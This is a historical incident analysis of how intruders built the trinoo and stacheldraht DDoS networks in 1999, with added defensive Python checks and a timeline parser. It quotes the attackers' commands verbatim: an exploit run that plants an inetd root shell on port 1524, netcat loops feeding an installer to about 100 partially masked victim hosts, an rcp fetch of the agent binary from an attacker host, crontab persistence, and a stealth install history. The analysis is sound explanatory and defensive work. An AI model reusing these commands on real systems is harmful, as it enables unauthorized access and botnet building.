
Anatomy of Setting up a DoS Network

In August 1999, a trinoo network of 2,200 systems was used against the University of Minnesota and several other sites worldwide. The group suspected of waging these attacks staged them from a compromised software development system at a corporation in Canada.

In the intruders' directory on that system were found tools for scanning entire Class B network blocks, several remote buffer overrun exploits, and denial of service programs. There were also log files that appear to be lists of potential victim systems. Two such files, with line counts (one host per line), are:


   41660 com.domains
   10549 216
   52209 total

The intruders scanned the Internet for systems with a known, remotely exploitable vulnerability, then compromised each one with the following script, passing it the IP address of a "vulnerable" system. The remote exploit ("r") is run twice, once with an extra -k option (both options are specific to the exploit). The command it executes on the victim appends a line to /tmp/bob defining an "ingreslock" service (TCP port 1524) whose server is an interactive root shell, then starts a second copy of inetd with /tmp/bob as its configuration file (the -s flag runs inetd stand-alone, outside the normal system startup). The final telnet to port 1524 shows whether the backdoor shell answers:


./r -6 -k $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
  >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
./r -6  $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
  >>/tmp/bob; /usr/sbin/inetd -s /tmp/bob"
echo Sleeping 2 seconds...
sleep 2
telnet $1 1524

The list of systems that were successfully penetrated (identified by filtering the script's output for signs of a successful "telnet" connection to the backdoor shell) was then used to generate another script. One such script was still in the intruders' cache of files and contained a list of 100 compromised systems. Each line pipes the output of "trin.sh" into the backdoor shell on one victim using netcat; fully qualified domain names have been added at the end of each line for clarity, and addresses and host names are partially masked:


./trin.sh | nc 128.172.XXX.XXX 1524 &	XXXXXX.egr.vcu.edu
./trin.sh | nc 128.172.XXX.XXX 1524 &	XXXXXX.egr.vcu.edu
./trin.sh | nc 128.172.XXX.XXX 1524 &	XXXXXX.egr.vcu.edu
./trin.sh | nc 128.172.XXX.XX 1524 &	XXXXXXXX.mas.vcu.edu
./trin.sh | nc 128.3.X.XX 1524 &	XXXXXXXX.lbl.gov
./trin.sh | nc 128.3.X.XX 1524 &	XXXXXXX.lbl.gov
./trin.sh | nc 128.3.X.XXX 1524 &	XXXXXX.lbl.gov
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.cns.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.emporium.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.fw.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.ee.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.ee.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXX.ece.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXX.cimss.vt.edu
./trin.sh | nc 128.173.XX.XX 1524 &	XXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XX.XXX 1524 &	XXXXXX.ise.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geog.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geog.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geog.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	
./trin.sh | nc 128.173.XXX.XXX 1524 &	
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXXX.esm.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXXX.geol.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXX.geol.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXX.me.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXX.esm.vt.edu
./trin.sh | nc 128.173.XXX.XXX 1524 &	XXXXXX.mine.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXX.isis.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXXXX.isis.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXXXX.ento.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXX.ento.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXXXXX.bse.vt.edu
./trin.sh | nc 128.173.XXX.XX 1524 &	XXXX.sv.vt.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXX.agecon.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXXXXXX.ps.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXX.psych.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.ehs.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	
./trin.sh | nc 128.174.XX.XX 1524 &	XXXXXXX.geology.uiuc.edu
./trin.sh | nc 128.174.XX.XX 1524 &	XXXX.nres.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXXXXXX.animal.uiuc.edu
./trin.sh | nc 128.174.XX.XXX 1524 &	XXXX.music.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.math.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.stat.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXX.me.uiuc.edu
./trin.sh | nc 128.174.XXX.XXX 1524 &	XXXXXXX.me.uiuc.edu

The script "trin.sh" does not run on the victim itself: it only echoes a sequence of commands, which netcat delivers to the root shell listening on port 1524 of each compromised system. The victim's shell then copies the trinoo agent binary ("leaf") with rcp from a host the intruders controlled (shown here as 192.168.0.1), installs it as /usr/sbin/rpc.listen (a name that blends in with the legitimate rpc.* daemons), starts it, and installs a crontab entry that re-runs it every minute so that the agent comes back if it is killed or the system is rebooted. The backslashes in front of the asterisks keep the victim's shell from expanding them as file globs before they are written to the "cron" file:


echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
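The two footholds above, the "ingreslock" root shell fed to a second inetd and the every-minute crontab entry that relaunches /usr/sbin/rpc.listen, both leave simple host-level indicators. The following is an added example of the checks an administrator could run against inetd configuration, process listings and crontabs; it is not code from this page or from the intruders' toolkit, and the inetd.conf, ps and crontab text it scans is constructed for illustration (the file paths, PIDs and service names are assumptions, not data from the compromised hosts).

```python
"""Indicator checks for the trinoo install chain shown above: an inetd
entry that hands a root shell to anyone connecting, a second inetd run
with a configuration file outside /etc, and an every-minute crontab
entry.  Added example; the sample text below is constructed."""
from typing import Dict, List

# Server programs that should never appear as an inetd service handler.
SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/bin/bash", "/bin/tcsh",
          "/usr/bin/sh", "/usr/bin/ksh"}

# Constructed sample of a /tmp/bob-style inetd configuration file.
SAMPLE_INETD_CONF = """\
ftp        stream  tcp  nowait  root  /usr/sbin/in.ftpd     in.ftpd
telnet     stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
ingreslock stream  tcp  nowait  root  /bin/sh               sh -i
"""

# Constructed 'ps -ef' output: the system inetd plus the intruders' copy.
SAMPLE_PS = """\
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root   142     1  0   Dec 20 ?        0:01 /usr/sbin/inetd -s
    root  8812     1  0 06:14:01 ?        0:00 /usr/sbin/inetd -s /tmp/bob
"""

# Constructed root crontab after 'crontab cron' from trin.sh has run.
SAMPLE_CRONTAB = """\
10 3 * * 0,4 /etc/cron.d/logchecker
10 3 * * 0   /usr/lib/newsyslog
* * * * * /usr/sbin/rpc.listen
"""


def audit_inetd_conf(text: str) -> List[Dict]:
    """Parse inetd.conf-style lines (service socket proto wait user server
    args...) and flag entries whose server program is a shell, or that pass
    "-i" (interactive shell) while running as root."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:          # malformed entry; inetd would reject it
            continue
        service, _sock, _proto, _wait, user, server = fields[:6]
        args = fields[6:]
        reasons = []
        if server in SHELLS:
            reasons.append("server program is a shell")
        if user == "root" and "-i" in args:
            reasons.append("interactive shell as root")
        if reasons:
            findings.append({"line": n, "service": service,
                             "server": server, "reasons": reasons})
    return findings


def find_rogue_inetd(ps_output: str) -> List[Dict]:
    """From 'ps -ef' output, report inetd processes whose configuration file
    (taken as the last non-option argument) lives outside /etc."""
    rogue = []
    for line in ps_output.splitlines():
        fields = line.split()
        idx = next((i for i, f in enumerate(fields)
                    if f == "inetd" or f.endswith("/inetd")), None)
        if idx is None:
            continue
        conf = [a for a in fields[idx + 1:] if not a.startswith("-")]
        if conf and not conf[-1].startswith("/etc/"):
            rogue.append({"pid": fields[1], "config": conf[-1]})
    return rogue


EVERY_MINUTE = ("*", "*", "*", "*", "*")


def audit_crontab(text: str, allowed=frozenset()) -> List[Dict]:
    """Flag crontab entries scheduled every minute whose program is not on
    an allowlist; trinoo's installer used exactly this to keep its agent
    running."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = tuple(fields[:5]), fields[5]
        program = command.split()[0]
        if schedule == EVERY_MINUTE and program not in allowed:
            hits.append({"program": program, "command": command})
    return hits


if __name__ == "__main__":
    print("inetd.conf:", audit_inetd_conf(SAMPLE_INETD_CONF))
    print("rogue inetd:", find_rogue_inetd(SAMPLE_PS))
    print("crontab:", audit_crontab(SAMPLE_CRONTAB))
```

On a real host the three inputs would come from the files named in the backdoor script and from "ps -ef" and "crontab -l"; a match from any one of the checks warrants comparing the flagged binary against a known-good copy rather than simply removing the entry, since the agent is still running in memory.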

The following shell .history file was found in December 1999 on a stacheldraht agent that had been identified with the "gag" scanner. The sequence kills any process whose name matches "ttymon" (the name the agent is installed under, borrowed from the Solaris terminal monitor), creates a hidden directory /usr/lib/libx/..., copies the agent binary ("td") from a host in the lu.se domain with rcp, starts it under nohup, and then deletes the binary from disk so that only the running process remains. The trailing semicolons are required by some remote exploit shells:


#+0946131241
ps -u root -e | grep ttymon | awk '{print "kill -9 "$1}' > .tmp &&
chmod 755 ./.tmp && ./.tmp && rm -f .tmp ;
#+0946131241
rm -rf /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx/... ;
#+0946131241
cd /usr/lib/libx/.../ ;
#+0946131241
rcp root@XXXXX.XXXXXXXX.lu.se:td ttymon ;
#+0946131244
nohup ./ttymon ;
#+0946131244
rm -rf ./ttymon ;

The numbers are Unix timestamps (seconds since the epoch) written into the history file ahead of each command. Converting the first and last ones shows how long it took to root the system, set up a DDoS agent, and clean up. The "ctime" command used here is a small local conversion utility, not a standard one; its output is in Pacific Standard Time (the first timestamp is 14:14:01 UTC):

% ctime 0946131241
Sat Dec 25  6:14:01 1999

% ctime 0946131244
Sat Dec 25  6:14:04 1999

Three seconds, at the one-second resolution of the timestamps.
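The same reconstruction can be automated for any history file written in this format, which is useful when there are dozens of agents to triage. The following is an added example, not tooling from this page: it parses the "#+epoch" lines into a timeline, reports the elapsed time, and carries the per-host estimate through to a network of a given size. The embedded sample reproduces the history file above (with the rcp source host masked as on the page); the times are rendered in UTC here, whereas the ctime output above is in Pacific Standard Time.

```python
"""Timeline reconstruction for a shell .history file in which each command
is preceded by a '#+<seconds since the epoch>' line, as in the
stacheldraht example above.  Added example; SAMPLE_HISTORY reproduces the
page's history file with the source host left masked."""
from datetime import datetime, timezone
from typing import List, Tuple

SAMPLE_HISTORY = """\
#+0946131241
ps -u root -e | grep ttymon | awk '{print "kill -9 "$1}' > .tmp &&
chmod 755 ./.tmp && ./.tmp && rm -f .tmp ;
#+0946131241
rm -rf /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx/... ;
#+0946131241
cd /usr/lib/libx/.../ ;
#+0946131241
rcp root@XXXXX.XXXXXXXX.lu.se:td ttymon ;
#+0946131244
nohup ./ttymon ;
#+0946131244
rm -rf ./ttymon ;
"""


def parse_history(text: str) -> List[Tuple[int, str]]:
    """Return (epoch, command) pairs.  A line without the '#+' prefix is a
    continuation of the current command, which rejoins the wrapped first
    entry (the ps/awk kill loop) into one record."""
    records: List[List] = []
    for line in text.splitlines():
        if line.startswith("#+"):
            records.append([int(line[2:].strip()), ""])
        elif records and line.strip():
            records[-1][1] = (records[-1][1] + " " + line.strip()).strip()
    return [(epoch, cmd) for epoch, cmd in records]


def timeline(records: List[Tuple[int, str]]) -> List[Tuple[int, str]]:
    """Offset in seconds from the first command, for each command."""
    start = records[0][0]
    return [(epoch - start, cmd) for epoch, cmd in records]


def elapsed_seconds(records: List[Tuple[int, str]]) -> int:
    """Time from the first command to the last, at one-second resolution."""
    return records[-1][0] - records[0][0]


def to_utc(epoch: int) -> str:
    """Render an epoch timestamp in ctime-like form, in UTC."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime(
        "%a %b %d %H:%M:%S %Y UTC")


def setup_hours(hosts: int, seconds_per_host: float) -> float:
    """Wall-clock hours to install agents serially on pre-selected hosts."""
    return hosts * seconds_per_host / 3600


if __name__ == "__main__":
    recs = parse_history(SAMPLE_HISTORY)
    for offset, cmd in timeline(recs):
        print(f"+{offset:2d}s  {cmd}")
    print("first:", to_utc(recs[0][0]))
    print("last: ", to_utc(recs[-1][0]))
    print("elapsed:", elapsed_seconds(recs), "seconds")
    for per_host in (3, 6):
        print(f"2,200 hosts at {per_host}s each:",
              f"{setup_hours(2200, per_host):.1f} hours")
```

The timeline makes the split visible at a glance: every step through the rcp carries offset 0, and the three seconds are spent entirely on the copy, so the transfer time of the agent binary, not the exploit, is what bounds how fast a network like this can be built.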

Assuming 3 to 6 seconds per host and a pre-selected list of vulnerable targets, setting up the 2,200-system network used against the University of Minnesota in August 1999 would have taken roughly 2 to 4 hours (2,200 hosts at 3 seconds is about 1.8 hours; at 6 seconds, about 3.7 hours). Reports from at least one site in the US, which recovered a syslog file showing the rcp transfers, confirm that thousands of systems can be set up in this manner in a matter of a few hours. (The preliminary scanning and sorting would presumably take days or weeks to accomplish, but generates very little attention at most sites.)



Dave Dittrich <dittrich@cac.washington.edu>
Last modified: Sat Jul 22 01:02:29 PDT 2000